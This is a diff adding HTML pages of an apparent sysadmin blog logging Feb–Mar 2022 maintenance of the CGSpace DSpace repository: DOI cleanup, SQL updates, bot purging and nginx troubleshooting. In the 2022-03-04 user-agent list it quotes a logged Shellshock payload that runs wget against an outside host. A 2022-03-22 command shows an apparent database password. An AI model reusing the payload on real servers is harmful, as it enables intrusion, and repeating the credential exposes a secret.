+<li>I found ~1,200 items with no <code>cg.identifier.doi</code>, but which had a DOI in their citation</li>
+<li>I cleaned up and normalized a few hundred others to use <a href="https://doi.org">https://doi.org</a> format</li>
+</ul>
+</li>
+<li>I&rsquo;m debating using the Crossref API to search for our DOIs and improve our metadata
+<ul>
+<li>For example: <a href="https://api.crossref.org/works/10.1016/j.ecolecon.2008.03.011">https://api.crossref.org/works/10.1016/j.ecolecon.2008.03.011</a></li>
+<li>There is good data on publishers, issue dates, volume/issue, and sometimes even licenses</li>
+</ul>
+</li>
+<li>I cleaned up  ~1,200 URLs that were using HTTP instead of HTTPS, fixed a bunch of handles, removed some handles from DOI field, etc</li>
+</ul>
+<h2 id="2022-02-20">2022-02-20</h2>
+<ul>
+<li>Yesterday I wrote a script to check our DOIs against Crossref&rsquo;s API and the did some investigation on dates, volumes, issues, pages, and types
+<ul>
+<li>While investigating issue dates in OpenRefine I created a new column using this GREL to show the number of days between Crossref&rsquo;s date and ours:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>abs(diff(toDate(cells[&#34;issued&#34;].value),toDate(cells[&#34;dcterms.issued[en_US]&#34;].value), &#34;days&#34;))
+</span></span></code></pre></div><ul>
+<li>In <em>most</em> cases Crossref&rsquo;s dates are more correct than ours, though there are a few odd cases that I don&rsquo;t know what strategy I want to use yet</li>
+<li>Start a full harvest on AReS</li>
+</ul>
+<h2 id="2022-02-21">2022-02-21</h2>
+<ul>
+<li>I added support for checking the license of DOIs to my Crossref script
+<ul>
+<li>I exported ~2,800 DOIs and ran a check on them, then merged the CGSpace CSV with the results of the script to inspect in OpenRefine</li>
+<li>There are hundreds of DOIs missing licenses in our data, even in this small subset of ~2,800 (out of 19,000 on CGSpace)</li>
+<li>I spot checked a few dozen in Crossref&rsquo;s data and found some incorrect ones, like on Elsevier, Wiley, and Sage journals</li>
+<li>I ended up using a series of GREL expressions in OpenRefine that ended up filtering out DOIs from these prefixes:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>or(
+</span></span><span style="display:flex;"><span>value.contains(&#34;10.1017&#34;),
+</span></span><span style="display:flex;"><span>value.contains(&#34;10.1007&#34;),
+</span></span><span style="display:flex;"><span>value.contains(&#34;10.1016&#34;),
+</span></span><span style="display:flex;"><span>value.contains(&#34;10.1098&#34;),
+</span></span><span style="display:flex;"><span>value.contains(&#34;10.1111&#34;),
+</span></span><span style="display:flex;"><span>value.contains(&#34;10.1002&#34;),
+</span></span><span style="display:flex;"><span>value.contains(&#34;10.1046&#34;),
+</span></span><span style="display:flex;"><span>value.contains(&#34;10.2135&#34;),
+</span></span><span style="display:flex;"><span>value.contains(&#34;10.1006&#34;),
+</span></span><span style="display:flex;"><span>value.contains(&#34;10.1177&#34;),
+</span></span><span style="display:flex;"><span>value.contains(&#34;10.1079&#34;),
+</span></span><span style="display:flex;"><span>value.contains(&#34;10.2298&#34;),
+</span></span><span style="display:flex;"><span>value.contains(&#34;10.1186&#34;),
+</span></span><span style="display:flex;"><span>value.contains(&#34;10.3835&#34;),
+</span></span><span style="display:flex;"><span>value.contains(&#34;10.1128&#34;),
+</span></span><span style="display:flex;"><span>value.contains(&#34;10.3732&#34;),
+</span></span><span style="display:flex;"><span>value.contains(&#34;10.2134&#34;)
+</span></span><span style="display:flex;"><span>)
+</span></span></code></pre></div><ul>
+<li>Many many of Crossref&rsquo;s records are correct where we have no license, and in some cases more correct when we have a different license
+<ul>
+<li>I ran license updates on ~167 DOIs in the end on CGSpace</li>
+</ul>
+</li>
+</ul>
+<h2 id="2022-02-24">2022-02-24</h2>
+<ul>
+<li>Update some audience metadata on CGSpace:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>dspace=# UPDATE metadatavalue SET text_value=&#39;Academics&#39; WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=144 AND text_value = &#39;Academicians&#39;;
+</span></span><span style="display:flex;"><span>UPDATE 354
+</span></span><span style="display:flex;"><span>dspace=# UPDATE metadatavalue SET text_value=&#39;Scientists&#39; WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=144 AND text_value = &#39;SCIENTISTS&#39;;
+</span></span><span style="display:flex;"><span>UPDATE 2
+</span></span></code></pre></div><h2 id="2022-02-25">2022-02-25</h2>
+<ul>
+<li>A few days ago Gaia sent me her notes on the third batch of TAC/ICW documents (items 401–700 in the spreadsheet)
+<ul>
+<li>I created a filter in LibreOffice and selected the IDs for items with the action &ldquo;delete&rdquo;, then I created a custom text facet in OpenRefine with this GREL:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>or(
+isNotNull(value.match(&#39;405&#39;)),
+isNotNull(value.match(&#39;410&#39;)),
+isNotNull(value.match(&#39;412&#39;)),
+isNotNull(value.match(&#39;414&#39;)),
+isNotNull(value.match(&#39;419&#39;)),
+isNotNull(value.match(&#39;436&#39;)),
+isNotNull(value.match(&#39;448&#39;)),
+isNotNull(value.match(&#39;449&#39;)),
+isNotNull(value.match(&#39;450&#39;)),
+...
+isNotNull(value.match(&#39;699&#39;))
+)
+</code></pre><ul>
+<li>Then I flagged all matching records, exported a CSV to use with SAFBuilder, and imported them on DSpace Test:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ JAVA_OPTS<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;-Xmx1024m -Dfile.encoding=UTF-8&#34;</span> dspace import --add --eperson<span style="color:#f92672">=</span>fuuu@umm.com --source /tmp/SimpleArchiveFormat --mapfile<span style="color:#f92672">=</span>./2022-02-25-tac-batch3-401to700.map
+</span></span></code></pre></div><h2 id="2022-02-26">2022-02-26</h2>
+<ul>
+<li>Upgrade CGSpace (linode18) to Ubuntu 20.04</li>
+<li>Start a full AReS harvest</li>
+</ul>
+<!-- raw HTML omitted -->
+
+  
+
+  
+
+</article> 
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/2022-03/index.html b/docs/2022-03/index.html
new file mode 100644
index 000000000..c49b678aa
--- /dev/null
+++ b/docs/2022-03/index.html
@@ -0,0 +1,530 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="March, 2022" />
+<meta property="og:description" content="2022-03-01
+
+Send Gaia the last batch of potential duplicates for items 701 to 980:
+
+$ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv &gt; /tmp/tac4.csv
+$ ./ilri/check-duplicates.py -i /tmp/tac4.csv -db dspace -u dspace -p &#39;fuuu&#39; -o /tmp/2022-03-01-tac-batch4-701-980.csv
+$ csvcut -c id,filename ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv &gt; /tmp/tac4-filenames.csv
+$ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv &gt; /tmp/2022-03-01-tac-batch4-701-980-filenames.csv
+" />
+<meta property="og:type" content="article" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2022-03/" />
+<meta property="article:published_time" content="2022-03-01T16:46:54+03:00" />
+<meta property="article:modified_time" content="2022-06-09T09:41:49+03:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="March, 2022"/>
+<meta name="twitter:description" content="2022-03-01
+
+Send Gaia the last batch of potential duplicates for items 701 to 980:
+
+$ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv &gt; /tmp/tac4.csv
+$ ./ilri/check-duplicates.py -i /tmp/tac4.csv -db dspace -u dspace -p &#39;fuuu&#39; -o /tmp/2022-03-01-tac-batch4-701-980.csv
+$ csvcut -c id,filename ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv &gt; /tmp/tac4-filenames.csv
+$ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv &gt; /tmp/2022-03-01-tac-batch4-701-980-filenames.csv
+"/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+<script type="application/ld+json">
+{
+  "@context": "http://schema.org",
+  "@type": "BlogPosting",
+  "headline": "March, 2022",
+  "url": "https://alanorth.github.io/cgspace-notes/2022-03/",
+  "wordCount": "1836",
+  "datePublished": "2022-03-01T16:46:54+03:00",
+  "dateModified": "2022-06-09T09:41:49+03:00",
+  "author": {
+    "@type": "Person",
+    "name": "Alan Orth"
+  },
+  "keywords": "Notes"
+}
+</script>
+
+
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/2022-03/">
+
+    <title>March, 2022 | CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2022-03/">March, 2022</a></h2>
+    <p class="blog-post-meta">
+<time datetime="2022-03-01T16:46:54+03:00">Tue Mar 01, 2022</time>
+ in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2022-03-01">2022-03-01</h2>
+<ul>
+<li>Send Gaia the last batch of potential duplicates for items 701 to 980:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv &gt; /tmp/tac4.csv
+</span></span><span style="display:flex;"><span>$ ./ilri/check-duplicates.py -i /tmp/tac4.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -o /tmp/2022-03-01-tac-batch4-701-980.csv
+</span></span><span style="display:flex;"><span>$ csvcut -c id,filename ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv &gt; /tmp/tac4-filenames.csv
+</span></span><span style="display:flex;"><span>$ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv &gt; /tmp/2022-03-01-tac-batch4-701-980-filenames.csv
+</span></span></code></pre></div><h2 id="2022-03-04">2022-03-04</h2>
+<ul>
+<li>Looking over the CGSpace Solr statistics from 2022-02
+<ul>
+<li>I see a few new bots, though once I expanded my search for user agents with &ldquo;www&rdquo; in the name I found so many more!</li>
+<li>Here are some of the more prevalent or weird ones:
+<ul>
+<li>axios/0.21.1</li>
+<li>Mozilla/5.0 (compatible; Faveeo/1.0; +http://www.faveeo.com)</li>
+<li>Nutraspace/Nutch-1.2 (<a href="https://www.nutraspace.com">www.nutraspace.com</a>)</li>
+<li>Mozilla/5.0 Moreover/5.1 (+http://www.moreover.com; <a href="mailto:webmaster@moreover.com">webmaster@moreover.com</a>)</li>
+<li>Mozilla/5.0 (compatible; Exploratodo/1.0; +http://www.exploratodo.com</li>
+<li>Mozilla/5.0 (compatible; GroupHigh/1.0; +http://www.grouphigh.com/)</li>
+<li>Crowsnest/0.5 (+http://www.crowsnest.tv/)</li>
+<li>Mozilla/5.0/Firefox/42.0 - nbertaupete95(at)gmail.com</li>
+<li>metha/0.2.27</li>
+<li>ZaloPC-win32-24v454</li>
+<li>Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:x.x.x) Gecko/20041107 Firefox/x.x</li>
+<li>ZoteroTranslationServer/WMF (mailto:noc@wikimedia.org)</li>
+<li>FullStoryBot/1.0 (+https://www.fullstory.com)</li>
+<li>Link Validity Check From: <a href="http://www.usgs.gov">http://www.usgs.gov</a></li>
+<li>OSPScraper (+https://www.opensyllabusproject.org)</li>
+<li>() { :;}; /bin/bash -c &quot;wget -O /tmp/bbb <a href="https://www.redel.net.br/1.php?id=3137382e37392e3138372e313832">www.redel.net.br/1.php?id=3137382e37392e3138372e313832</a>&quot;</li>
+</ul>
+</li>
+<li>I submitted <a href="https://github.com/atmire/COUNTER-Robots/pull/52">a pull request to COUNTER-Robots</a> with some of these</li>
+</ul>
+</li>
+<li>I purged a bunch of hits from the stats using the <code>check-spider-hits.sh</code> script:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>]$ ./ilri/check-spider-hits.sh -f dspace/config/spiders/agents/ilri -p
+</span></span><span style="display:flex;"><span>Purging 6 hits from scalaj-http in statistics
+</span></span><span style="display:flex;"><span>Purging 5 hits from lua-resty-http in statistics
+</span></span><span style="display:flex;"><span>Purging 9 hits from AHC in statistics
+</span></span><span style="display:flex;"><span>Purging 7 hits from acebookexternalhit in statistics
+</span></span><span style="display:flex;"><span>Purging 1011 hits from axios\/[0-9] in statistics
+</span></span><span style="display:flex;"><span>Purging 2216 hits from Faveeo\/[0-9] in statistics
+</span></span><span style="display:flex;"><span>Purging 1164 hits from Moreover\/[0-9] in statistics
+</span></span><span style="display:flex;"><span>Purging 740 hits from Exploratodo\/[0-9] in statistics
+</span></span><span style="display:flex;"><span>Purging 585 hits from GroupHigh\/[0-9] in statistics
+</span></span><span style="display:flex;"><span>Purging 438 hits from Crowsnest\/[0-9] in statistics
+</span></span><span style="display:flex;"><span>Purging 1326 hits from nbertaupete95 in statistics
+</span></span><span style="display:flex;"><span>Purging 182 hits from metha\/[0-9] in statistics
+</span></span><span style="display:flex;"><span>Purging 68 hits from ZaloPC-win32-24v454 in statistics
+</span></span><span style="display:flex;"><span>Purging 1644 hits from Firefox\/x\.x in statistics
+</span></span><span style="display:flex;"><span>Purging 678 hits from ZoteroTranslationServer in statistics
+</span></span><span style="display:flex;"><span>Purging 27 hits from FullStoryBot in statistics
+</span></span><span style="display:flex;"><span>Purging 26 hits from Link Validity Check in statistics
+</span></span><span style="display:flex;"><span>Purging 26 hits from OSPScraper in statistics
+</span></span><span style="display:flex;"><span>Purging 1 hits from 3137382e37392e3138372e313832 in statistics
+</span></span><span style="display:flex;"><span>Purging 2755 hits from Nutch-[0-9] in statistics
+</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
+</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 12914
+</span></span></code></pre></div><ul>
+<li>I added a few from that list to the local overrides in our DSpace while I wait for feedback from the COUNTER-Robots project</li>
+</ul>
+<h2 id="2022-03-05">2022-03-05</h2>
+<ul>
+<li>Start AReS harvest</li>
+</ul>
+<h2 id="2022-03-10">2022-03-10</h2>
+<ul>
+<li>A few days ago Gaia sent me her notes on the fourth batch of TAC/ICW documents (items 701–980 in the spreadsheet)
+<ul>
+<li>I created a filter in LibreOffice and selected the IDs for items with the action &ldquo;delete&rdquo;, then I created a custom text facet in OpenRefine with this GREL:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>or(
+isNotNull(value.match(&#39;707&#39;)),
+isNotNull(value.match(&#39;709&#39;)),
+isNotNull(value.match(&#39;710&#39;)),
+isNotNull(value.match(&#39;711&#39;)),
+isNotNull(value.match(&#39;713&#39;)),
+isNotNull(value.match(&#39;717&#39;)),
+isNotNull(value.match(&#39;718&#39;)),
+...
+isNotNull(value.match(&#39;821&#39;))
+)
+</code></pre><ul>
+<li>Then I flagged all matching records, exported a CSV to use with SAFBuilder, and imported them on DSpace Test:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ JAVA_OPTS<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;-Xmx1024m -Dfile.encoding=UTF-8&#34;</span> dspace import --add --eperson<span style="color:#f92672">=</span>fuu@ummm.com --source /tmp/SimpleArchiveFormat --mapfile<span style="color:#f92672">=</span>./2022-03-10-tac-batch4-701to980.map
+</span></span></code></pre></div><h2 id="2022-03-12">2022-03-12</h2>
+<ul>
+<li>Update all containers and rebuild OpenRXV on linode20:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ docker images | grep -v ^REPO | sed <span style="color:#e6db74">&#39;s/ \+/:/g&#39;</span> | cut -d: -f1,2 | xargs -L1 docker pull
+</span></span><span style="display:flex;"><span>$ docker-compose build
+</span></span></code></pre></div><ul>
+<li>Then run all system updates and reboot</li>
+<li>Start a full harvest on AReS</li>
+</ul>
+<h2 id="2022-03-16">2022-03-16</h2>
+<ul>
+<li>Meeting with KM/KS group to start talking about the way forward for repositories and web publishing
+<ul>
+<li>We agreed to form a sub-group of the transition task team to put forward a recommendation for repository and web publishing</li>
+</ul>
+</li>
+</ul>
+<h2 id="2022-03-20">2022-03-20</h2>
+<ul>
+<li>Start a full harvest on AReS</li>
+</ul>
+<h2 id="2022-03-21">2022-03-21</h2>
+<ul>
+<li>Review a few submissions for Open Repositories 2022</li>
+<li>Test one tentative DSpace 6.4 patch and give feedback on a few more that Hrafn missed</li>
+</ul>
+<h2 id="2022-03-22">2022-03-22</h2>
+<ul>
+<li>I accidentally dropped the PostgreSQL database on DSpace Test, forgetting that I had all the CGIAR CAS items there
+<ul>
+<li>I had been meaning to update my local database&hellip;</li>
+</ul>
+</li>
+<li>I re-imported the CGIAR CAS documents to <a href="https://dspacetest.cgiar.org/handle/10568/118432">DSpace Test</a> and generated the PDF thumbnails:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ JAVA_OPTS<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;-Xmx1024m -Dfile.encoding=UTF-8&#34;</span> dspace import --add --eperson<span style="color:#f92672">=</span>fuu@ma.com --source /tmp/SimpleArchiveFormat --mapfile<span style="color:#f92672">=</span>./2022-03-22-tac-700.map
+</span></span><span style="display:flex;"><span>$ JAVA_OPTS<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;-Xmx1024m -Dfile.encoding=UTF-8&#34;</span> dspace filter-media -p <span style="color:#e6db74">&#34;ImageMagick PDF Thumbnail&#34;</span> -i 10568/118432
+</span></span></code></pre></div><ul>
+<li>On my local environment I decided to run the <code>check-duplicates.py</code> script one more time with all 700 items:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/TAC_ICW_GreenCovers/2022-03-22-tac-700.csv &gt; /tmp/tac.csv
+</span></span><span style="display:flex;"><span>$ ./ilri/check-duplicates.py -i /tmp/tac.csv -db dspacetest -u dspacetest -p <span style="color:#e6db74">&#39;dom@in34sniper&#39;</span> -o /tmp/2022-03-22-tac-duplicates.csv
+</span></span><span style="display:flex;"><span>$ csvcut -c id,filename ~/Downloads/2022-01-21-CGSpace-TAC-ICW.csv &gt; /tmp/tac-filenames.csv
+</span></span><span style="display:flex;"><span>$ csvjoin -c id /tmp/2022-03-22-tac-duplicates.csv /tmp/tac-filenames.csv &gt; /tmp/tac-final-duplicates.csv
+</span></span></code></pre></div><ul>
+<li>I sent the resulting 76 items to Gaia to check</li>
+<li>UptimeRobot said that CGSpace was down
+<ul>
+<li>I looked and found many locks belonging to the REST API application:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ psql -c <span style="color:#e6db74">&#39;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;&#39;</span> | grep -o -E <span style="color:#e6db74">&#39;(dspaceWeb|dspaceApi)&#39;</span> | sort | uniq -c | sort -n
+</span></span><span style="display:flex;"><span>    301 dspaceWeb
+</span></span><span style="display:flex;"><span>   2390 dspaceApi
+</span></span></code></pre></div><ul>
+<li>Looking at nginx&rsquo;s logs, I found the top addresses making requests today:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># awk <span style="color:#e6db74">&#39;{print $1}&#39;</span> /var/log/nginx/rest.log | sort | uniq -c | sort -h
+</span></span><span style="display:flex;"><span>   1977 45.5.184.2
+</span></span><span style="display:flex;"><span>   3167 70.32.90.172
+</span></span><span style="display:flex;"><span>   4754 54.195.118.125
+</span></span><span style="display:flex;"><span>   5411 205.186.128.185
+</span></span><span style="display:flex;"><span>   6826 137.184.159.211
+</span></span></code></pre></div><ul>
+<li>137.184.159.211 is on DigitalOcean using this user agent: <code>GuzzleHttp/6.3.3 curl/7.81.0 PHP/7.4.28</code>
+<ul>
+<li>I blocked this IP in nginx and the load went down immediately</li>
+</ul>
+</li>
+<li>205.186.128.185 is on Media Temple, but it&rsquo;s OK because it&rsquo;s the CCAFS publications importer bot</li>
+<li>54.195.118.125 is on Amazon, but is also a CCAFS publications importer bot apparently (perhaps a test server)</li>
+<li>70.32.90.172 is on Media Temple and has no user agent</li>
+<li>What is surprising to me is that we already have an nginx rule to return HTTP 403 for requests without a user agent
+<ul>
+<li>I verified it works as expected with an empty user agent:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -H User-Agent:<span style="color:#e6db74">&#39;&#39;</span> <span style="color:#e6db74">&#39;https://dspacetest.cgiar.org/rest/handle/10568/34799?expand=all&#39;</span> 
+</span></span><span style="display:flex;"><span>Due to abuse we no longer permit requests without a user agent. Please specify a descriptive user agent, for example containing the word &#39;bot&#39;, if you are accessing the site programmatically. For more information see here: https://dspacetest.cgiar.org/page/about.
+</span></span></code></pre></div><ul>
+<li>I note that the nginx log shows &lsquo;-&rsquo; for a request with an empty user agent, which would be indistinguishable from a request with a &lsquo;-&rsquo;, for example these were successful:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>70.32.90.172 - - [22/Mar/2022:11:59:10 +0100] &#34;GET /rest/handle/10568/34374?expand=all HTTP/1.0&#34; 200 10671 &#34;-&#34; &#34;-&#34;
+</span></span><span style="display:flex;"><span>70.32.90.172 - - [22/Mar/2022:11:59:14 +0100] &#34;GET /rest/handle/10568/34795?expand=all HTTP/1.0&#34; 200 11394 &#34;-&#34; &#34;-&#34;
+</span></span></code></pre></div><ul>
+<li>I can only assume that these requests used a literal &lsquo;-&rsquo; so I will have to add an nginx rule to block those too</li>
+<li>Otherwise, I see from my notes that 70.32.90.172 is the wle.cgiar.org REST API harvester&hellip; I should ask Macaroni Bros about that</li>
+</ul>
+<h2 id="2022-03-24">2022-03-24</h2>
+<ul>
+<li>Maria from ABC asked about a reporting discrepancy on AReS
+<ul>
+<li>I think it&rsquo;s because the last harvest was over the weekend, and she was expecting to see items submitted this week</li>
+</ul>
+</li>
+<li>Paola from ABC said they are decomissioning the server where many of their library PDFs are hosted
+<ul>
+<li>She asked if we can download them and upload them directly to CGSpace</li>
+</ul>
+</li>
+<li>I re-created my local Artifactory container</li>
+<li>I am doing a walkthrough of DSpace 7.3-SNAPSHOT to see how things are lately
+<ul>
+<li>One thing I realized is that OAI is no longer a standalone web application, it is part of the <code>server</code> app now: http://localhost:8080/server/oai/request?verb=Identify</li>
+</ul>
+</li>
+<li>Deploy PostgreSQL 12 on CGSpace (linode18) but don&rsquo;t switch over yet, because I see some users active
+<ul>
+<li>I did this on DSpace Test in 2022-02 so I just followed the same procedure</li>
+<li>After that I ran all system updates and rebooted the server</li>
+</ul>
+</li>
+</ul>
+<h2 id="2022-03-25">2022-03-25</h2>
+<ul>
+<li>Looking at the PostgreSQL database size on CGSpace after the update yesterday:</li>
+</ul>
+<p><img src="/cgspace-notes/2022/03/postgres_size_cgspace-day.png" alt="PostgreSQL database size day"></p>
+<ul>
+<li>The space saving in indexes of recent PostgreSQL releases is awesome!</li>
+<li>Import a DSpace 6.x database dump from production into my local DSpace 7 database
+<ul>
+<li>I see I still the same errors <a href="/cgspace-notes/2021-04/">I saw in 2021-04</a> when testing DSpace 7.0 beta 5</li>
+<li>I had to delete some old migrations, as well as all Atmire ones first:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspace7= ☘ DELETE FROM schema_version WHERE version IN (&#39;5.0.2017.09.25&#39;, &#39;6.0.2017.01.30&#39;, &#39;6.0.2017.09.25&#39;);
+</span></span><span style="display:flex;"><span>localhost/dspace7= ☘ DELETE FROM schema_version WHERE description LIKE &#39;%Atmire%&#39; OR description LIKE &#39;%CUA%&#39; OR description LIKE &#39;%cua%&#39;;
+</span></span></code></pre></div><ul>
+<li>Then I was able to migrate to DSpace 7 with <code>dspace database migrate ignored</code> as the <a href="https://wiki.lyrasis.org/display/DSDOC7x/Upgrading+DSpace">DSpace upgrade notes say</a>
+<ul>
+<li>I see that the <a href="https://github.com/DSpace/dspace-angular/issues/1357">flash of unstyled content bug</a> still exists on dspace-angluar&hellip; ouch!</li>
+</ul>
+</li>
+<li>Start a harvest on AReS</li>
+</ul>
+<h2 id="2022-03-26">2022-03-26</h2>
+<ul>
+<li>Update dspace-statistics-api to Falcon 3.1.0 and <a href="https://github.com/ilri/dspace-statistics-api/releases/tag/v1.4.3">release v1.4.3</a></li>
+</ul>
+<h2 id="2022-03-28">2022-03-28</h2>
+<ul>
